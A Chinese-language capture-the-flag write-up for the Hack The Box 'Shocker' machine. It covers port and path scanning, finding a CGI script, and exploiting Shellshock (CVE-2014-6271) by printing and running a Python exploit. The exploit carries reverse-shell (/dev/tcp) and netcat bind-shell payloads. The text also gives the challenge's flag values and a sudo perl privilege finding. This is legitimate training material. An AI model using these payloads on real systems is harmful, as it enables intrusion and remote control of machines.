HTB：Shocker[WriteUP]

连接至HTB服务器并启动靶机

1.How many TCP ports are listening on Shocker?

使用nmap对靶机TCP端口进行开放扫描

2.What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface?

使用nmap对靶机80、2222端口进行脚本、服务信息扫描

使用浏览器直接访问靶机80端口

使用ffuf对靶机进行路径FUZZ

3.What is the name of the script in the cgi-bin directory?

继续使用ffuf对该目录进行文件扫描

4.Optional question: The output from user.sh matches the output from what standard Linux command?

5.What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI?

使用searchsploit搜索关键词

查看该EXP代码

6.What user is the webserver running as on Shocker?

使用python运行该EXP脚本

7.Submit the flag located in the shelly user's home directory.

USER_FLAG：247db5ad8edaf851b335894b3331607f

8.Which binary can the shelly user can run as root on Shocker?

查看该用户可特权运行的命令

9.Submit the flag located in root's home directory.

直接到GTFOBins查询相关提权命令

ROOT_FLAG：0197a11120606d77dc7881331357decb

连接至HTB服务器并启动靶机

靶机IP：10.10.10.56

分配IP：10.10.14.12

1.How many TCP ports are listening on Shocker?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.56

由扫描结果可见，靶机开放端口：80、2222共2个端口

2.What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface?

使用nmap对靶机80、2222端口进行脚本、服务信息扫描

nmap -p 80,2222 -sCV 10.10.10.56

使用浏览器直接访问靶机80端口

可以看到页面就是纯纯的静态HTML，而且技术栈也是相当干净

使用ffuf对靶机进行路径FUZZ

ffuf -u http://10.10.10.56/FUZZ -w ../dictionary/common.txt

上面扫到了一个目录cgi-bin

3.What is the name of the script in the `cgi-bin` directory?

继续使用ffuf对该目录进行文件扫描

ffuf -u http://10.10.10.56/cgi-bin/FUZZ -w ../dictionary/common.txt -e .php,.py,.bak,.sh

将user.sh下载到本地

wget http://10.10.10.56/cgi-bin/user.sh -O user.sh

查看user.sh内容

cat user.sh

Content-Type: text/plain

Just an uptime test script

08:48:37 up 1:11, 0 users, load average: 0.00, 0.00, 0.00

4.Optional question: The output from `user.sh` matches the output from what standard Linux command?

直接运行user.sh所输出的内容，与uptime标准输出格式一致

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# uptime
09:16:20 up 13:42, 3 users, load average: 0.07, 0.07, 0.06

5.What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI?

通过前面Wappalyzer插件可知靶机使用Apache 2.4.18

使用searchsploit搜索关键词

searchsploit Apache cgi

取出Shellshock相关描述的EXP到当前目录下

searchsploit -m 34900.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 34900.py
Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
      URL: https://www.exploit-db.com/exploits/34900
     Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
    Codes: CVE-2014-6278, CVE-2014-6271
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/34900.py

由输出可知，该EXP基于漏洞：CVE-2014-6271

查看该EXP代码

cat 34900.py

#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sysstop = False
proxyhost = ""
proxyport = 0def usage():print """Shellshock apache mod_cgi remote exploitUsage:
./exploit.py var=<value>Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxyPayloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)Example:./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234Credits:Federico Galatolo 2014
"""sys.exit(0)def exploit(lhost,lport,rhost,rport,payload,pages):headers = {"Cookie": payload, "Referer": payload}for page in pages:if stop:returnprint "[-] Trying exploit on : "+pageif proxyhost != "":c = httplib.HTTPConnection(proxyhost,proxyport)c.request("GET","http://"+rhost+page,headers=headers)res = c.getresponse()else:c = httplib.HTTPConnection(rhost)c.request("GET",page,headers=headers)res = c.getresponse()if res.status == 404:print "[*] 404 on : "+pagetime.sleep(1)args = {}for arg in sys.argv[1:]:ar = arg.split("=")args[ar[0]] = ar[1]
try:args['payload']
except:usage()if args['payload'] == 'reverse':try:lhost = args['lhost']lport = int(args['lport'])rhost = args['rhost']payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"except:usage()
elif args['payload'] == 'bind':try:rhost = args['rhost']rport = args['rport']payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"except:usage()
else:print "[*] Unsupported payload"usage()try:pages = args['pages'].split(",")
except:pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]try:proxyhost,proxyport = args['proxy'].split(":")
except:passif args['payload'] == 'reverse':serversocket = socket(AF_INET, SOCK_STREAM)buff = 1024addr = (lhost, lport)serversocket.bind(addr)serversocket.listen(10)print "[!] Started reverse shell handler"thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':serversocket = socket(AF_INET, SOCK_STREAM)addr = (rhost,int(rport))thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))buff = 1024while True:if args['payload'] == 'reverse':clientsocket, clientaddr = serversocket.accept()print "[!] Successfully exploited"print "[!] Incoming connection from "+clientaddr[0]stop = Trueclientsocket.settimeout(3)while True:reply = raw_input(clientaddr[0]+"> ")clientsocket.sendall(reply+"\n")try:data = clientsocket.recv(buff)print dataexcept:passif args['payload'] == 'bind':try:serversocket = socket(AF_INET, SOCK_STREAM)time.sleep(1)serversocket.connect(addr)print "[!] Successfully exploited"print "[!] Connected to "+rhoststop = Trueserversocket.settimeout(3)while True:reply = raw_input(rhost+"> ")serversocket.sendall(reply+"\n")data = serversocket.recv(buff)print dataexcept:pass

6.What user is the webserver running as on Shocker?

使用python运行该EXP脚本

python2 34900.py rhost=10.10.10.56 rport=80 lhost=10.10.14.12 lport=1425 pages=/cgi-bin/user.sh payload=reverse

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python2 34900.py rhost=10.10.10.56 rport=80 lhost=10.10.14.12 lport=1425 pages=/cgi-bin/user.sh payload=reverse
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> whoami
shelly

由whoami命令回显可知，当前用户为：shelly

7.Submit the flag located in the shelly user's home directory.

查找user_flag位置并查看其内容

10.10.10.56> find / -name 'user.txt' 2>/dev/null
/home/shelly/user.txt

10.10.10.56> cat /home/shelly/user.txt
247db5ad8edaf851b335894b3331607f

USER_FLAG：247db5ad8edaf851b335894b3331607f

8.Which binary can the shelly user can run as root on Shocker?

查看该用户可特权运行的命令

sudo -l

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

可特权运行的文件为：perl